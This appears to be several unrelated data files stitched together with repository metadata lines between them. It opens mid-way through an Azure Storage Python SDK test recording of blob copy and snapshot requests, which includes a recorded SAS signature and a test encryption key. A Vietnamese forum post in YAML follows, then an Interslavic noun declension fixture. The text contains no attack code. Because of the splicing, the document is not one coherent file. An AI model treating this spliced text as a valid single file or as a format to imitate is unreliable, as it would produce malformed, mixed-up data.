azsdk-python-storage-blob/12.6.0b2 Python/3.8.5 (Windows-10-10.0.19041-SP0) x-ms-blob-type: - BlockBlob x-ms-date: - Tue, 01 Dec 2020 21:48:51 GMT x-ms-version: - '2020-04-08' method: PUT uri: https://storagename.blob.core.windows.net/utcontainer7ce1476/blob7ce1476 response: body: string: '' headers: content-length: - '0' content-md5: - BmRZdU7mXzYVn1nIbsazYg== date: - Tue, 01 Dec 2020 21:48:47 GMT etag: - '"0x8D89642E27569BD"' last-modified: - Tue, 01 Dec 2020 21:48:48 GMT server: - Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-content-crc64: - OIyBbegbJhU= x-ms-request-server-encrypted: - 'true' x-ms-version: - '2020-04-08' x-ms-version-id: - '2020-12-01T21:48:48.4278717Z' status: code: 201 message: Created - request: body: null headers: Accept: - '*/*' Accept-Encoding: - gzip, deflate Connection: - keep-alive Content-Length: - '0' If-None-Match: - '*' User-Agent: - azsdk-python-storage-blob/12.6.0b2 Python/3.8.5 (Windows-10-10.0.19041-SP0) x-ms-blob-type: - BlockBlob x-ms-copy-source: - https://seanmcccanary3.blob.core.windows.net/utcontainer7ce1476/blob7ce1476?se=2020-12-01T22%3A48%3A51Z&sp=rt&sv=2020-04-08&sr=b&sig=nXIlekwMEe2ewJc4AorMQoTvpOqffEO/x7/MKnrqf/w%3D x-ms-copy-source-blob-properties: - 'true' x-ms-date: - Tue, 01 Dec 2020 21:48:51 GMT x-ms-encryption-algorithm: - AES256 x-ms-encryption-key: - MDEyMzQ1NjcwMTIzNDU2NzAxMjM0NTY3MDEyMzQ1Njc= x-ms-encryption-key-sha256: - 3QFFFpRA5+XANHqwwbT4yXDmrT/2JaLt/FKHjzhOdoE= x-ms-version: - '2020-04-08' method: PUT uri: https://storagename.blob.core.windows.net/utcontainer7ce1476/blob1copy response: body: string: '' headers: content-length: - '0' date: - Tue, 01 Dec 2020 21:48:48 GMT etag: - '"0x8D89642E2AA8D28"' last-modified: - Tue, 01 Dec 2020 21:48:48 GMT server: - Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-content-crc64: - OIyBbegbJhU= x-ms-encryption-key-sha256: - 3QFFFpRA5+XANHqwwbT4yXDmrT/2JaLt/FKHjzhOdoE= x-ms-request-server-encrypted: - 'true' x-ms-version: - '2020-04-08' x-ms-version-id: - '2020-12-01T21:48:48.7761192Z' status: code: 201 message: Created - request: body: null headers: Accept: - '*/*' Accept-Encoding: - gzip, deflate Connection: - keep-alive Content-Length: - '0' User-Agent: - azsdk-python-storage-blob/12.6.0b2 Python/3.8.5 (Windows-10-10.0.19041-SP0) x-ms-date: - Tue, 01 Dec 2020 21:48:51 GMT x-ms-version: - '2020-04-08' method: PUT uri: https://storagename.blob.core.windows.net/utcontainer7ce1476/blob1copy?comp=snapshot response: body: string: "\uFEFF<?xml version=\"1.0\" encoding=\"utf-8\"?><Error><Code>BlobUsesCustomerSpecifiedEncryption</Code><Message>The blob is encrypted with customer specified encryption, but it was not provided in the request.\nRequestId:ca040dbc-a01e-002d-172b-c869b1000000\nTime:2020-12-01T21:48:48.9078953Z</Message></Error>" headers: content-length: - '301' content-type: - application/xml date: - Tue, 01 Dec 2020 21:48:48 GMT server: - Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-error-code: - BlobUsesCustomerSpecifiedEncryption x-ms-version: - '2020-04-08' status: code: 409 message: The blob is encrypted with customer specified encryption, but it was not provided in the request. - request: body: null headers: Accept: - '*/*' Accept-Encoding: - gzip, deflate Connection: - keep-alive Content-Length: - '0' User-Agent: - azsdk-python-storage-blob/12.6.0b2 Python/3.8.5 (Windows-10-10.0.19041-SP0) x-ms-date: - Tue, 01 Dec 2020 21:48:51 GMT x-ms-encryption-algorithm: - AES256 x-ms-encryption-key: - MDEyMzQ1NjcwMTIzNDU2NzAxMjM0NTY3MDEyMzQ1Njc= x-ms-encryption-key-sha256: - 3QFFFpRA5+XANHqwwbT4yXDmrT/2JaLt/FKHjzhOdoE= x-ms-version: - '2020-04-08' method: PUT uri: https://storagename.blob.core.windows.net/utcontainer7ce1476/blob1copy?comp=snapshot response: body: string: '' headers: content-length: - '0' date: - Tue, 01 Dec 2020 21:48:48 GMT etag: - '"0x8D89642E2AA8D28"' last-modified: - Tue, 01 Dec 2020 21:48:48 GMT server: - Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-server-encrypted: - 'false' x-ms-snapshot: - '2020-12-01T21:48:49.0122881Z' x-ms-version: - '2020-04-08' x-ms-version-id: - '2020-12-01T21:48:49.0132881Z' status: code: 201 message: Created version: 1
26.348361
187
0.584383
c4f662cd84321dfa03d9358276e3a24888753462
515
yml
YAML
threads/3009470/posts/55487554.yml
voz-living/documents
a5fb94005e8c2d681bbda8c85a40509ba5b11cd9
[ "MIT" ]
null
null
null
threads/3009470/posts/55487554.yml
voz-living/documents
a5fb94005e8c2d681bbda8c85a40509ba5b11cd9
[ "MIT" ]
null
null
null
threads/3009470/posts/55487554.yml
voz-living/documents
a5fb94005e8c2d681bbda8c85a40509ba5b11cd9
[ "MIT" ]
null
null
null
url: showpost.php?p=55487554&postcount=5083 id: 55487554 tid: 3009470 num: 5083 datetime: 2013-03-02T14:16:00.000Z user: img: null name: apologize122 title: Junior Member joinDate: 2012-08-31T16:00:00.000Z posts: 24 id: '1085084' title: 'Re: [Giúp đỡ] Xin ảnh Bìa FB độc và đẹp!' content: html: "\r\n\t\t\t\r\n\t\t\t&#x111;&#xE1;nh d&#x1EA5;u h&#xF3;ng ph&#xE1;t <img src=\"/images/smilies/Off/smile.gif\" border=\"0\" alt=\"\" title=\"Smile\" class=\"inlineimg\">\r\n\t\t" text: đánh dấu hóng phát
30.294118
186
0.669903
042c116a64b50f4f871cdca092f1a6ff469e9f16
461
yml
YAML
packages/nouns/lib/__fixtures__/036226_izdajnik.yml
medzuslovjansky/standard
433f01da93e10f7f9c04750f94de4bda7a07c42f
[ "MIT" ]
1
2020-10-12T06:25:33.000Z
2020-10-12T06:25:33.000Z
packages/nouns/lib/__fixtures__/036226_izdajnik.yml
medzuslovjansky/standard
433f01da93e10f7f9c04750f94de4bda7a07c42f
[ "MIT" ]
null
null
null
packages/nouns/lib/__fixtures__/036226_izdajnik.yml
medzuslovjansky/standard
433f01da93e10f7f9c04750f94de4bda7a07c42f
[ "MIT" ]
null
null
null
--- id: "36226" word: "izdajnik" meta: gender: "masculine" animated: true declensions: singular: nom: "izdajnik" acc: "izdajnika" gen: "izdajnika" loc: "izdajniku" dat: "izdajniku" ins: "izdajnikom" voc: "izdajniče" plural: nom: "izdajniki" acc: "izdajnikov" gen: "izdajnikov" loc: "izdajnikah" dat: "izdajnikam" ins: "izdajnikami" voc: "izdajniki"
19.208333
24
0.54013